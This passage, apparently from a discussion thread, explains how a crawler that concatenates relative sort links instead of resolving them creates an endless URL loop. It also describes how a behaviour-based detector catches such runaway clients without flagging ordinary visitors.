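```

With correct resolution the four sort links lead back to the same four pages and the crawl stops at five distinct URLs; with concatenation every visit manufactures four new URLs and the crawl only stops at the cap, which is the loop the thread describes. The detector keys on behaviour (same client, same path, a query string that never repeats and keeps growing a second '?'), so a client that changes its agent string still trips it, while a visitor who clicks a sort link or two does not.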